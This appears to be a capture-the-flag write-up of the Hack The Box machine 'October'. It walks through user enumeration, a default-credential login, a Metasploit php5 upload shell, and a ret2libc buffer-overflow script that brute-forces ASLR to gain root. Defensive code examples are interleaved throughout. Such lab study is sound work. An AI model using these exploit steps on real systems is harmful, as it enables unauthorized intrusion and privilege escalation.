Hackthebox.eu - Retired - October
Recon
As always, I start with a simple up/down scan on all TCP ports to see what is live:
# nmap -T 4 -p- -oX /root/Desktop/HTB/October/nmapb.xml october.htb
Then I convert the output to HTML to make it pretty
xsltproc /root/Desktop/HTB/October/nmapb.xml -o /root/Desktop/HTB/October/nmapb.html
Not much open, just 22 and 80.
Let's scan those ports with -A to try to fingerprint the OS and services:
# nmap -T 4 -p22,80 -A -oX /root/Desktop/HTB/October/nmapf.xml october.htb
Then convert that to HTML too.
Let's see what is on port 80.
A quick Google search for October CMS turns up a lot of authenticated attack vectors. Let's see if we can create an account.
Exploit
Just filling in some generic things, I set the password to "password" (BTW, test@test.com said it was already taken).
Now it wants us to change the password.
I changed the password to Password1. In hindsight, I don't think this step was necessary.
Ok let's poke around and see what access our new account might have given us.
Under the forums, I selected a channel and now I have the option to post a new topic.
I was able to create a test posting
Googling around I found this site for exploits,
which exploits the backend login page for October. It gives the following path as the default backend login page:
/backend/backend/auth/signin
Let's see if that is where ours is.
We didn't get anywhere else with the exploit on that page because our target requires the login fields to be set, but we did learn about this admin login page.
Let's see if we can break in.
I tried modifying the intercepted Burp request in Repeater to see if I could get any more data.
We did find some data leaks
If we send a user that doesn't exist we get back "A user was not found with the given credentials"
But if we send one that does exist
We get a message "A user was found to match all plain text credentials however hashed credential "password" did not match"
So we can use this to suss out some valid login names to attack
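The difference between those two messages is exactly what a login form should not reveal. As an added example (not code from the post or from October CMS), here is a small Python model of both behaviours: login_leaky reproduces the two observed messages, while login_uniform returns one generic message for every failure, hashes a dummy record for unknown users so response time does not leak what the message no longer does, and compares digests in constant time. The user store, salt and password are constructed for the example.

```python
import hashlib
import hmac

GENERIC_ERROR = "Invalid username or password."


def _hash_password(salt: bytes, password: str) -> bytes:
    # PBKDF2-HMAC-SHA256 with a modest iteration count so the example runs quickly.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 10_000)


# Constructed sample user store: username -> (salt, password hash).
# Hypothetical data for this example only, not the box's real accounts.
_SALT = b"example-salt-not-real"
USERS = {
    "admin": (_SALT, _hash_password(_SALT, "correct horse battery staple")),
}

# Dummy record used for unknown usernames, so the unknown-user path does the
# same amount of hashing work as the known-user path.
_DUMMY = (b"dummy-salt", _hash_password(b"dummy-salt", "not-a-real-password"))


def login_leaky(username: str, password: str):
    """Behaviour observed on the box: the error text depends on whether the user exists."""
    record = USERS.get(username)
    if record is None:
        return False, "A user was not found with the given credentials."
    salt, expected = record
    if not hmac.compare_digest(_hash_password(salt, password), expected):
        return False, ("A user was found to match all plain text credentials "
                       'however hashed credential "password" did not match')
    return True, "OK"


def login_uniform(username: str, password: str):
    """Hardened version: one message, one code path, constant-time comparison."""
    salt, expected = USERS.get(username, _DUMMY)
    # Always hash, even for an unknown user, then decide.
    digest_ok = hmac.compare_digest(_hash_password(salt, password), expected)
    if digest_ok and username in USERS:
        return True, "OK"
    return False, GENERIC_ERROR
```

Both functions return a (success, message) pair; the point of the hardened one is that an unknown user and a wrong password produce byte-for-byte the same response.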
I tried other combos of names mentioned on the site, Alexey Bobkov & Samuel Georges, but couldn't get the site to verify they exist.
A little more digging showed those are the creators of October itself, nothing to do with this site apparently.
Also while googling I found the default creds for October are admin/admin
Guess what?
We got it
Earlier I found an authenticated attack that has a Metasploit module.
This exploit uploads a .php5 file to get a shell. October uses a blacklist to keep files with certain extensions from being uploaded and executed:
protected function blockedExtensions()
{
    return [
        'asp',
        'avfp',
        'aspx',
        'cshtml',
        'cfm',
        'go',
        'gsp',
        'hs',
        'jsp',
        'ssjs',
        'js',
        'lasso',
        'lp',
        'op',
        'lua',
        'p',
        'cgi',
        'ipl',
        'pl',
        'php',
        'php3',
        'php4',
        'phtml',
        'py',
        'rhtml',
        'rb',
        'rbw',
        'smx',
        'tcl',
        'dna',
        'tpl',
        'r',
        'w',
        'wig'
    ];
}
As you can see in this list php5 is not listed and therefore is not blocked. So this exploit uses php5 to create a shell back to the attacker.
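A blacklist like this is only as good as its last entry, which is why an alternate PHP extension gets through. As an added example (not code from the post or from October CMS), the Python below models the blacklist check on the list shown above next to an allow-list check, and reports which constructed sample names the blacklist lets through but the allow-list rejects. The allow-list contents and the sample file names are assumptions made for the example.

```python
# Extension list copied from the blockedExtensions() function shown above.
BLOCKED_EXTENSIONS = {
    "asp", "avfp", "aspx", "cshtml", "cfm", "go", "gsp", "hs", "jsp", "ssjs",
    "js", "lasso", "lp", "op", "lua", "p", "cgi", "ipl", "pl", "php", "php3",
    "php4", "phtml", "py", "rhtml", "rb", "rbw", "smx", "tcl", "dna", "tpl",
    "r", "w", "wig",
}

# Constructed allow-list: the media types a hypothetical site actually needs.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "webp", "pdf", "txt", "mp4", "mp3", "zip"}


def _extensions(filename: str):
    """All dotted suffixes of a name, lower-cased: 'Shell.PHP.jpg' -> ['php', 'jpg']."""
    name = filename.rsplit("/", 1)[-1].lower()
    parts = name.split(".")
    return parts[1:] if len(parts) > 1 else []


def blocklist_permits(filename: str) -> bool:
    """Model of the blacklist check: only the final extension is compared against the list."""
    exts = _extensions(filename)
    last = exts[-1] if exts else ""
    return last not in BLOCKED_EXTENSIONS


def allowlist_permits(filename: str) -> bool:
    """Allow-list check: every suffix must be a known-safe type.

    Anything not explicitly listed (php5 included) fails, and so does a name
    whose inner suffix is executable, such as 'x.php.jpg'."""
    exts = _extensions(filename)
    return bool(exts) and all(e in ALLOWED_EXTENSIONS for e in exts)


def compare(filenames):
    """Return the names the blacklist lets through but the allow-list rejects."""
    return [f for f in filenames if blocklist_permits(f) and not allowlist_permits(f)]


# Constructed sample upload names for the comparison.
SAMPLE_UPLOADS = ["photo.jpg", "notes.txt", "shell.php", "shell.php5", "shell.php.jpg", "Shell.PHP"]

if __name__ == "__main__":
    for name in SAMPLE_UPLOADS:
        print("%-16s blacklist=%-5s allowlist=%s" % (name, blocklist_permits(name), allowlist_permits(name)))
    print("gaps in the blacklist:", compare(SAMPLE_UPLOADS))
```

The model lower-cases the name before comparing, which the defensive check needs anyway; the lesson is that the allow-list needs no knowledge of every executable extension a server might honour.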
Let's load up metasploit and give it a whirl
# msfconsole
Use 5
Let's check the options
As you can see admin/admin are already set for the creds, so we just need to give it the RHOST (the machine we are attacking, october.htb) and the LHOST (my VPN IP).
And we have our foothold!!
We are in, running as www-data.
Under /home we find
And we can already read user.txt in harry's directory
A little more about the box uuid
Let's move LinEnum.sh over to the box
I have the script saved in my /Payloads folder.
Here you can start SimpleHTTPServer, and you will see the download there
Then on the october.htb box I did
Then we had to give the file executable permissions
chmod +x ./LinEnum.sh
Then we can run it
./LinEnum.sh
Here we can see a root-owned file, /usr/local/bin/ovrflw, that we can execute.
Let's check it out; ovrflw sounds like something that might be susceptible to a buffer overflow attack.
I'm not great with buffer overflows yet, so I'm leaning pretty hard on some examples I can find around,
chief among them being:
First I load the program up in gdb and just give it 9 digits to see if it works.
Now I'm going to use pattern_create.rb to generate some longer strings for me
# ruby /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
So here I have 100 characters I can now throw into gdb to see if we still work okay or get a buffer overflow
100 seemed to work fine, so let's double it to 200.
OK, we got a segmentation fault, so the buffer is less than 200 bytes, because the program crashed when we sent 200.
Now we can grab the address of the fault, 0x64413764, and put it into pattern_offset to find the EIP offset:
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 64413764
[*] Exact match at offset 112
Let's try sending 112 A's followed by 4 B's to see if we can get the EIP to read 42424242 (0x42 is hex for "B"):
ruby -e "print 'A'*112 +'B'*4"
Which gives us:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
This did exactly what we wanted to see, the EIP was overwritten with B's
So we absolutely know the buffer can hold 112 characters before it crashes and starts to overwrite the eip
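Here is what pattern_create and pattern_offset actually do to turn the crash value into that offset, as an added example (it is not the Metasploit tools' own code and not part of the post): pattern_create builds the same cyclic string as the Ruby tool, in which every 4-byte window is unique, and pattern_offset converts the value seen in EIP to the little-endian bytes it had on the stack (0x64413764 is "d7Ad" in memory) and finds them in that string, giving 112 as above.

```python
import string

MAX_PATTERN = 26 * 26 * 10 * 3  # 20280 characters before the triples would repeat


def pattern_create(length: int) -> str:
    """Metasploit-style cyclic pattern: Aa0Aa1...Aa9Ab0Ab1... truncated to `length`."""
    if not 0 < length <= MAX_PATTERN:
        raise ValueError("length must be between 1 and %d" % MAX_PATTERN)
    chunks = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                chunks.append(upper + lower + digit)
                if len(chunks) * 3 >= length:
                    return "".join(chunks)[:length]
    return "".join(chunks)[:length]  # not reached because of the bound check


def pattern_offset(crash_value, length: int = MAX_PATTERN) -> int:
    """Map the value seen in EIP back to its position in the pattern.

    crash_value is either the integer gdb showed (0x64413764) or the 4-character
    string. An integer is converted to the little-endian byte order it had on
    the stack, so 0x64413764 becomes 'd7Ad'. Returns -1 when not found."""
    if isinstance(crash_value, int):
        needle = crash_value.to_bytes(4, "little").decode("latin-1")
    else:
        needle = crash_value
    return pattern_create(length).find(needle)


if __name__ == "__main__":
    print(pattern_create(100))
    print("offset of 0x64413764:", pattern_offset(0x64413764))
```

Because the 4-byte windows are unique, the first match is the only match, which is why the tool can report an exact offset rather than a guess.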
Let's take a look at the assembly for the program
disas main
Let's check the security of the file too (I installed peda at this point too):
git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
NX is enabled and RELRO is partial… wtf does that mean?
NX
"The NX bit (no-execute) is a technology used in CPUs to segregate areas of memory for use by either storage of processor instructions (code) or for storage of data"
Basically it marks parts of memory as data only: they can be read and written but never executed.
RELRO
In full mode, this makes the dynamic linker resolve all the imported library functions when the program starts and then makes the GOT read-only for the rest of execution, so we can't overwrite the GOT entries that point into the linked libraries.
In partial mode, like we have here, the GOT is still writable; the linker just orders the sections so the GOT sits before .bss:
https://en.wikipedia.org/wiki/.bss
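The checksec-style output comes straight from the ELF program headers. As an added example (not from the post and not peda's code), the Python below reads the PT_GNU_STACK and PT_GNU_RELRO headers and the dynamic section of a 32-bit ELF to report NX and partial versus full RELRO. build_sample constructs minimal ELF32 images so the checker runs without a real binary; check_file can be pointed at an actual 32-bit executable. The constants are from the ELF specification and glibc's elf.h; the sample images are constructed for the example.

```python
import struct

# Program-header types, segment flags and dynamic tags from the ELF spec / glibc elf.h
PT_DYNAMIC, PT_GNU_STACK, PT_GNU_RELRO = 2, 0x6474E551, 0x6474E552
PF_X, PF_W, PF_R = 1, 2, 4
DT_NULL, DT_BIND_NOW, DT_FLAGS, DT_FLAGS_1 = 0, 24, 30, 0x6FFFFFFB
DF_BIND_NOW, DF_1_NOW = 0x8, 0x1

EHDR32 = "<16sHHIIIIIHHHHHH"  # ELF32 file header, 52 bytes
PHDR32 = "<IIIIIIII"          # ELF32 program header, 32 bytes
DYN32 = "<iI"                 # ELF32 dynamic entry: d_tag, d_val


def check_elf32(data: bytes) -> dict:
    """Report NX and RELRO status from the program headers, the way checksec does."""
    if data[:4] != b"\x7fELF" or data[4] != 1:
        raise ValueError("expected a little-endian ELF32 image")
    hdr = struct.unpack_from(EHDR32, data, 0)
    phoff, phentsize, phnum = hdr[5], hdr[9], hdr[10]
    nx = False          # no PT_GNU_STACK header at all means an executable stack
    relro = "none"
    dynamic = None
    for i in range(phnum):
        p_type, p_offset, _, _, p_filesz, _, p_flags, _ = struct.unpack_from(
            PHDR32, data, phoff + i * phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)   # NX: the stack is mapped without execute
        elif p_type == PT_GNU_RELRO:
            relro = "partial"           # the loader will make this range read-only
        elif p_type == PT_DYNAMIC:
            dynamic = (p_offset, p_filesz)
    # Full RELRO additionally needs BIND_NOW, so the GOT is filled in (and then
    # locked) before main() runs instead of being resolved lazily while writable.
    if relro == "partial" and dynamic:
        off, size = dynamic
        for j in range(size // 8):
            tag, val = struct.unpack_from(DYN32, data, off + j * 8)
            if tag == DT_NULL:
                break
            if (tag == DT_BIND_NOW or (tag == DT_FLAGS and val & DF_BIND_NOW)
                    or (tag == DT_FLAGS_1 and val & DF_1_NOW)):
                relro = "full"
    return {"nx": nx, "relro": relro}


def check_file(path: str) -> dict:
    with open(path, "rb") as f:
        return check_elf32(f.read())


def build_sample(exec_stack: bool, relro: bool, bind_now: bool) -> bytes:
    """Construct a minimal ELF32 image (header, 3 program headers, dynamic section)."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)   # 32-bit, little-endian, v1
    dyn_entries = ([(DT_BIND_NOW, 0)] if bind_now else []) + [(DT_NULL, 0)]
    dyn = b"".join(struct.pack(DYN32, t, v) for t, v in dyn_entries)
    dyn_off = 52 + 3 * 32                                  # right after the headers
    stack_flags = PF_R | PF_W | (PF_X if exec_stack else 0)
    phdrs = [
        (PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16),
        (PT_GNU_RELRO if relro else 0, 0, 0, 0, 0, 0, PF_R, 1),
        (PT_DYNAMIC, dyn_off, 0, 0, len(dyn), len(dyn), PF_R | PF_W, 4),
    ]
    header = struct.pack(EHDR32, ident, 3, 3, 1, 0, 52, 0, 0, 52, 32, len(phdrs), 40, 0, 0)
    return header + b"".join(struct.pack(PHDR32, *p) for p in phdrs) + dyn


if __name__ == "__main__":
    # Same combination the box shows: NX on, RELRO partial.
    print(check_elf32(build_sample(exec_stack=False, relro=True, bind_now=False)))
```

The practical reading of the result: "partial" means the GOT stays writable during execution, exactly the situation described above, while "full" is the setting that takes GOT overwrites off the table.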
This box also has ASLR enabled, which means the memory addresses change every time the program executes. But since it is only a 32-bit executable, there are only 512 spots the data can be randomized to, so we will just use a script to loop 512 times and hopefully one of those runs will land on the same address space as the data we are pulling out of the system now.
https://en.wikipedia.org/wiki/Address_space_layout_randomization
This means we have a little extra work to do. Normally we could just send a bunch of NOP sleds before our code and point the EIP somewhere around where our NOP sleds should be; it would hit one and slide all the way down to our code. But with NX enabled we can't get code execution from the stack. We are going to have to find another route.
So we need to make our attack a return-to-libc attack.
"A 'return-to-libc' attack is a computer security attack usually starting with a buffer overflow in which a subroutine return address on a call stack is replaced by an address of a subroutine that is already present in the process' executable memory, bypassing the no-execute bit feature (if present) and ridding the attacker of the need to inject their own code. The first example of this attack in the wild was contributed by Alexander Peslyak on the Bugtraq mailing list in 1997.[1]"
We will follow along with this blog to craft our overflow on October.
Let's get our info; we need four values:
Base Address
System Offset
Exit Offset
/bin/sh Offset
Base Address
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
/bin/sh
strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh
162bac /bin/sh
System
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system
1443: 00040310 56 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
Exit
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit
139: 00033260 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0
So we have
Base 0x00040310
System 0x00040310
Exit 0x00033260
/bin/sh 0x00162bac
Now, just like in the blog, we will make our little Python script to create the overflow to pass to the program:
from subprocess import call
import struct

# base must be the address libc is loaded at in the target process (it moves
# under ASLR); the other three values are offsets inside libc from readelf/strings.
base = 0x00040310
syst = 0x00040310    # offset of system() inside libc
exit = 0x00033260    # offset of exit() inside libc
binsh = 0x00162bac   # offset of the "/bin/sh" string inside libc

# Absolute addresses, packed as 32-bit little-endian values
syst_final = struct.pack("<I", base + syst)
exit_final = struct.pack("<I", base + exit)
binsh_final = struct.pack("<I", base + binsh)

# 112 bytes of padding to reach the saved EIP, then the ret2libc chain:
# address of system(), the return address for system() (exit), and the
# argument to system() (pointer to "/bin/sh")
buf = b"A" * 112
buf += syst_final
buf += exit_final
buf += binsh_final

# Run up to 512 times so that one attempt lines up with the randomized base
i = 0
while i < 512:
    print("Try: %s" % i)
    print(buf)
    i += 1
    ret = call(["/usr/local/bin/ovrflw", buf])
Copy that over to the October box using wget and give the file execute rights:
chmod +x ./October.py
Then run the script:
python ./October.py
I saw a bunch of this until it seemed like it just stopped
Then whoami showed me we had won.
Got that root.txt